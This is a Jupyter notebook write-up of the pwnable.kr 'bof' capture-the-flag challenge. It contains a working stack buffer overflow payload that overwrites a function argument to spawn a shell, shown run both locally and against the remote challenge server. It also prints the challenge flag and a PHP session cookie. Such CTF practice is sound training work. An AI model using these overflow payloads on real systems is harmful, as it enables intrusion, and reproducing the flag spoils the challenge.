```
Nana told me that buffer overflow is one of the most common software vulnerability. 
Is that true?

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000
```

In [14]:
import socket, ssl, threading

class TCPClient:
    def __init__(self, host, port, tls=False):
        self.host = host
        self.port = port
        self.tls = tls
        self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if self.tls:
            context = ssl.create_default_context()
            self.client = context.wrap_socket(self.client, server_hostname=self.host)
        self.client.connect((self.host, self.port))
        print("Connected to {}:{}".format(self.host, self.port))
        self.comm = list()
        self.thread = threading.Thread(target=self.Recv, args=())
        self.thread.start()
    
    def Send(self, data):
        self.comm.append(data)
        self.client.send(data)
        
    def Recv(self):
        while True:
            recv = self.client.recv(4096)
            if len(recv) != 0:
                print("recieved {} bytes".format(len(recv)))
                self.comm.append(recv)
            else:
                break
        
    def Close(self):
        self.client.close()

In [2]:
import os, pty, subprocess, threading

class Process:
    def __init__(self, cmd):
        self.master, self.slave = pty.openpty()
        self.proc = subprocess.Popen(cmd, shell=True, stdin=self.slave, stdout=self.slave, stderr=self.slave, close_fds=True)
        os.close(self.slave)
        self.comm = list()
        self.thread = threading.Thread(target=self.Read, args=())
        self.thread.start()
        
    def Read(self):
        while True:
            try:
                data = os.read(self.master, 1024)
            except:
                print("Read Error!")
                break
            if data != b'':
                self.comm.append(data)
                print(data)
            else: 
                print("Process is Terminated!")
                break
            
    def Write(self, data):
        try:
            os.write(self.master, data)
        except:
            print("Write Error!")
            
    def Close(self):
        self.proc.terminate()
        os.close(self.master)

In [3]:
import urllib.request

resp = urllib.request.urlopen("http://pwnable.kr/bin/bof.c")
code = resp.read().decode()
with open("bof.c", "wt") as f:
    f.write(code)
print(code)

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}




In [4]:
resp = urllib.request.urlopen("http://pwnable.kr/bin/bof")
data = resp.read()
with open("bof", "wb") as f:
    f.write(data)

In [5]:
!ls -al

합계 72
drwxrwxr-x  3 chihong chihong  4096  7월 23 23:54 .
drwxrwxr-x 19 chihong chihong  4096  7월 19 22:52 ..
drwxrwxr-x  2 chihong chihong  4096  7월 20 05:05 .ipynb_checkpoints
-rwxrwxr-x  1 chihong chihong  7348  7월 23 23:54 bof
-rw-rw-r--  1 chihong chihong   308  7월 23 23:54 bof.c
-rw-rw-r--  1 chihong chihong 31629  7월 23 23:54 bof.ipynb
-rw-rw-r--  1 chihong chihong  5768  7월 20 12:46 collision.ipynb
-rw-rw-r--  1 chihong chihong  5029  7월 20 05:03 fd.ipynb


In [6]:
!chmod +x bof

In [7]:
!objdump -d -M intel bof


bof:     file format elf32-i386


Disassembly of section .init:

00000474 <_init>:
 474:	53                   	push   ebx
 475:	83 ec 08             	sub    esp,0x8
 478:	e8 00 00 00 00       	call   47d <_init+0x9>
 47d:	5b                   	pop    ebx
 47e:	81 c3 77 1b 00 00    	add    ebx,0x1b77
 484:	8b 83 f4 ff ff ff    	mov    eax,DWORD PTR [ebx-0xc]
 48a:	85 c0                	test   eax,eax
 48c:	74 05                	je     493 <_init+0x1f>
 48e:	e8 7d 00 00 00       	call   510 <__gmon_start__@plt>
 493:	e8 58 01 00 00       	call   5f0 <frame_dummy>
 498:	e8 93 02 00 00       	call   730 <__do_global_ctors_aux>
 49d:	83 c4 08             	add    esp,0x8
 4a0:	5b                   	pop    ebx
 4a1:	c3                   	ret    

Disassembly of section .plt:

000004b0 <gets@plt-0x10>:
 4b0:	ff b3 04 00 00 00    	push   DWORD PTR [ebx+0x4]
 4b6:	ff a3 08 00 00 00    	jmp    DWORD PTR [ebx+0x8]
 4bc:	00 00                	add    BYTE PTR [eax],al
	...

000004c0 <gets@plt>:
 4c

```
0000062c <func>:
 62c:	55                   	push   ebp
 62d:	89 e5                	mov    ebp,esp
 62f:	83 ec 48             	sub    esp,0x48
 
 canary set
 632:	65 a1 14 00 00 00    	mov    eax,gs:0x14
 638:	89 45 f4             	mov    DWORD PTR [ebp-0xc],eax      #ebp-12: canary
 63b:	31 c0                	xor    eax,eax
 
 63d:	c7 04 24 8c 07 00 00 	mov    DWORD PTR [esp],0x78c
 644:	e8 fc ff ff ff       	call   645 <func+0x19>
 
 649:	8d 45 d4             	lea    eax,[ebp-0x2c]               #epb-44: overflowme
 64c:	89 04 24             	mov    DWORD PTR [esp],eax
 64f:	e8 fc ff ff ff       	call   650 <func+0x24>
 
 654:	81 7d 08 be ba fe ca 	cmp    DWORD PTR [ebp+0x8],0xcafebabe  #epb+8: argument1 of func, 0xdeadbeef
 65b:	75 0e                	jne    66b <func+0x3f>
 
 65d:	c7 04 24 9b 07 00 00 	mov    DWORD PTR [esp],0x79b
 664:	e8 fc ff ff ff       	call   665 <func+0x39>
 669:	eb 0c                	jmp    677 <func+0x4b> 
 
 66b:	c7 04 24 a3 07 00 00 	mov    DWORD PTR [esp],0x7a3
 672:	e8 fc ff ff ff       	call   673 <func+0x47>
 
 canary check
 677:	8b 45 f4             	mov    eax,DWORD PTR [ebp-0xc]         #epb-12: canary
 67a:	65 33 05 14 00 00 00 	xor    eax,DWORD PTR gs:0x14
 681:	74 05                	je     688 <func+0x5c>
 683:	e8 fc ff ff ff       	call   684 <func+0x58>
 
 688:	c9                   	leave  
 689:	c3                   	ret    
```

### Local

In [32]:
cmd = "./bof"
bof = Process(cmd)

b'overflow me : \r\n'


In [33]:
magic = 0xcafebabe
dummy_size = 52

payload = b"a"*dummy_size + magic.to_bytes(4, "little") + b"\n"
bof.Write(payload)

b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xbe\xba\xfe\xca\r\n'
b"/bin/sh: 0: can't access tty; job control turned off\r\n$ "


In [34]:
bof.Close()
print(bof.comm)

[b'overflow me : \r\n', b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xbe\xba\xfe\xca\r\n', b"/bin/sh: 0: can't access tty; job control turned off\r\n$ "]


### Remote

In [35]:
host = "pwnable.kr"; port = 9000
c = TCPClient(host, port)

Connected to pwnable.kr:9000


In [36]:
print(payload)
c.Send(payload)

b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xbe\xba\xfe\xca\n'


In [37]:
import time

cmd = b"ls -al\n"
c.Send(cmd)
time.sleep(1)
print(c.comm[-1].decode())

recieved 477 bytes
total 1032
drwxr-x---   3 root bof     4096 Oct 23  2016 .
drwxr-xr-x 114 root root    4096 May 19 15:59 ..
d---------   2 root root    4096 Jun 12  2014 .bash_history
-r-xr-x---   1 root bof     7348 Sep 12  2016 bof
-rw-r--r--   1 root root     308 Oct 23  2016 bof.c
-r--r-----   1 root bof       32 Jun 11  2014 flag
-rw-------   1 root root 1016506 Jul 23 12:04 log
-rw-r--r--   1 root root       0 Oct 23  2016 log2
-rwx------   1 root root     760 Sep 11  2014 super.pl



In [38]:
cmd = b"cat flag\n"
c.Send(cmd)
time.sleep(1)
print(c.comm[-1].decode())

recieved 32 bytes
daddy, I just pwned a buFFer :)



In [39]:
c.Close()
flag = c.comm[-1].decode()
print(c.comm)

[b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xbe\xba\xfe\xca\n', b'ls -al\n', b'total 1032\ndrwxr-x---   3 root bof     4096 Oct 23  2016 .\ndrwxr-xr-x 114 root root    4096 May 19 15:59 ..\nd---------   2 root root    4096 Jun 12  2014 .bash_history\n-r-xr-x---   1 root bof     7348 Sep 12  2016 bof\n-rw-r--r--   1 root root     308 Oct 23  2016 bof.c\n-r--r-----   1 root bof       32 Jun 11  2014 flag\n-rw-------   1 root root 1016506 Jul 23 12:04 log\n-rw-r--r--   1 root root       0 Oct 23  2016 log2\n-rwx------   1 root root     760 Sep 11  2014 super.pl\n', b'cat flag\n', b'daddy, I just pwned a buFFer :)\n']


### submit

In [49]:
import http.client, urllib.parse

session_id = "i77tu2mn5vmtjnj5ft6gd9cn24"

host = "pwnable.kr"
header = {
    "Cookie": "PHPSESSID=" + session_id,
    "Content-Type": "application/x-www-form-urlencoded",
}

In [55]:
method = "POST"
path ="/lib.php?cmd=auth"
flag = c.comm[-1].decode().strip()
param = {"flag": flag}
body = urllib.parse.urlencode(param)
conn = http.client.HTTPSConnection(host)
conn.request(method, path, body, header)
resp = conn.getresponse()
resp_header = resp.getheaders()
resp_body = resp.read()
url = "https://" + host + path
print("HTTP Request: {} -> {} {} bytes".format(url, resp.status, len(resp_body)))
conn.close()
print(resp_body.decode())

HTTP Request: https://pwnable.kr/lib.php?cmd=auth -> 200 94 bytes
<script>alert("You already authenticated this flag");window.location.href='play.php';</script>
